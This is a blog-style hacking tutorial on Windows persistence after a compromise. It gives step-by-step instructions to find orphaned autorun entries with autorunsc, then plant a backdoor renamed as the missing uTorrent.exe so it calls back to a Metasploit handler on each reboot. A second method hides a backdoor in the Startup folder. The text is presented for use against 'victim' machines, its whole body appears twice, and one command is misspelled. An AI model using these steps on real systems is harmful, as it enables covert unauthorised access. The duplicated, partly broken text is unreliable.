Get shell using missing autorun
Today we will see another method to maintaining access of compromised pc.
(A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever pc is restarted , program will run in background.When uninstallation of program is not completed ; then it fails to remove its value from registry. So it`s called Missing Autoruns.
After compromised pc ; we have to find missing autoruns in victim machine.For this purpose we will use sysinternal `s autorunsc.exe.
(1)Get meterpreter shell.
(2)Upload sysinternal`s autoruns.exe & autorun.exe to victim machine.
(3)Now from uploaded directory execute following command to get missing autoruns of machine
autorunsc.exe -a | findstr /n /R "File\ not\ found"
(4)Now we have list of file which is missing ; these files are run at startup time.
missing-autoruns
(5)In my case you can see that uTorrent.exe is missing .
(6)So now i rename my backdoor to uTorrent .exe & uploaded to the path where it`s not found.
upload-backdoor
Now whenever machine is restarted you get shell.(Don`t forget to running multi/handler!!!)
For just POC ; you can run autorunsc.exe again to find out whether our backdoor (uTorrent.exe) is written successfully or not?
missing -autorun-backdoor
In above image you can see that uTorrent.exe is no longer missing which missed in previous step.
(B)Now this is second method; but may be suspicious.
When you put binary in start up folder it will run automatically when pc is started.
Startup Folder Location in windows Xp:-
C:\Documents and Settings\"nirav"\Start Menu\Programs\Startup
Startup Folder location In windows 7:-
C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
So upload your binary to start up folder ;make it hidden using following command.
attrb +h backdoor.exe
Restart machine & Hopefully you will get shell.
(A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever pc is restarted , program will run in background.When uninstallation of program is not completed ; then it fails to remove its value from registry. So it`s called Missing Autoruns.
After compromised pc ; we have to find missing autoruns in victim machine.For this purpose we will use sysinternal `s autorunsc.exe.
(1)Get meterpreter shell.
(2)Upload sysinternal`s autoruns.exe & autorun.exe to victim machine.
(3)Now from uploaded directory execute following command to get missing autoruns of machine
autorunsc.exe -a | findstr /n /R "File\ not\ found"
(4)Now we have list of file which is missing ; these files are run at startup time.
missing-autoruns
(5)In my case you can see that uTorrent.exe is missing .
(6)So now i rename my backdoor to uTorrent .exe & uploaded to the path where it`s not found.
upload-backdoor
Now whenever machine is restarted you get shell.(Don`t forget to running multi/handler!!!)
For just POC ; you can run autorunsc.exe again to find out whether our backdoor (uTorrent.exe) is written successfully or not?
missing -autorun-backdoor
In above image you can see that uTorrent.exe is no longer missing which missed in previous step.
(B)Now this is second method; but may be suspicious.
When you put binary in start up folder it will run automatically when pc is started.
Startup Folder Location in windows Xp:-
C:\Documents and Settings\"nirav"\Start Menu\Programs\Startup
Startup Folder location In windows 7:-
C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
So upload your binary to start up folder ;make it hidden using following command.
attrb +h backdoor.exe
Restart machine & Hopefully you will get shell.
Comments
Post a Comment